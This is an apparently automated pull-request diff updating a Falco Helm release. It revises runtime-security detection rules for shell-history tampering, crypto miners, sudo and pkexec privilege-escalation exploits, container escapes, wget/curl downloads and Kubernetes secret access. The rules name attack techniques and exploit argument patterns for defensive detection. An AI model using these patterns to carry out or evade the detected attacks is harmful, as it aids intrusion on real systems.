     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
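As the comments added above note, switching from `contains` to `endswith "ash_history"` still covers both `.bash_history` and `.ash_history`, while no longer matching paths that merely embed the string. A quick Python illustration of that suffix logic — the function name is illustrative:

```python
def is_shell_history(path: str) -> bool:
    # endswith "ash_history" matches both ".bash_history" and ".ash_history",
    # mirroring the modify_shell_history / truncate_shell_history macros.
    return (
        path.endswith("ash_history")
        or path.endswith("zsh_history")
        or "fish_read_history" in path
        or path.endswith("fish_history")
    )
```

A path such as `/var/backups/bash_history.tar.gz` would have matched the old `contains` form but not the new suffix check.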
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
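The updated condition above broadens the match from `stratum+tcp` alone to the four common Stratum URI schemes. A small Python sketch of the substring check — the scheme list is copied from the rule; the rest is illustrative:

```python
# Stratum mining-pool URI schemes matched by the updated rule condition.
STRATUM_SCHEMES = ("stratum+tcp", "stratum2+tcp", "stratum+ssl", "stratum2+ssl")

def looks_like_stratum_miner(cmdline: str) -> bool:
    # Mirrors `proc.cmdline contains ...` for each scheme.
    return any(scheme in cmdline for scheme in STRATUM_SCHEMES)
```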
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which
+    # use of an ingress remote file copy tool in a container is expected.
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    - macro: curl_download
+      condition: proc.name = curl and
+                 (proc.cmdline contains " -o " or
+                 proc.cmdline contains " --output " or
+                 proc.cmdline contains " -O " or
+                 proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detects an attempt to exploit a container escape using the release_agent file. By running a container with certain capabilities, a privileged user can modify the release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
+    -
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64,
+        k8s.gcr.io/prometheus-to-sd
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule: K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
    # cluster creation. This may signify a permission setting that is too broad.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: a34a6b941188f80f1ba27fd6af4fe16110ab9054660a706eac161bc2d2ceaaf7
+        checksum/rules: 97a8ecad02de96810bc54ca7e9b7dda56420f82b2c64e05504bedc6888119841
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules
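
Several macros introduced in this update (`user_known_mount_in_privileged_containers`, `user_known_ingress_remote_file_copy_activities`) default to `(never_true)` and exist purely as override points. A minimal sketch of overriding one of them in `falco_rules.local.yaml`, which the `rules_file` list loads after `falco_rules.yaml` so local definitions replace the shipped defaults; the image name below is a hypothetical example, not part of this chart:

```yaml
# falco_rules.local.yaml -- read after falco_rules.yaml, so a macro
# redefined here replaces the default (never_true) stub.
# "my-registry/ci-runner" is a hypothetical trusted image for illustration.
- macro: user_known_ingress_remote_file_copy_activities
  condition: (container.image.repository = "my-registry/ci-runner")
```

With this in place, the new "Launch Ingress Remote File Copy Tools in Container" rule stays enabled cluster-wide but skips wget/curl downloads originating from that image.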

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.3 chore(deps): update helm release falco to v1.19.4 Jun 21, 2022
@github-actions
Contributor

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.4

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. 
This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is 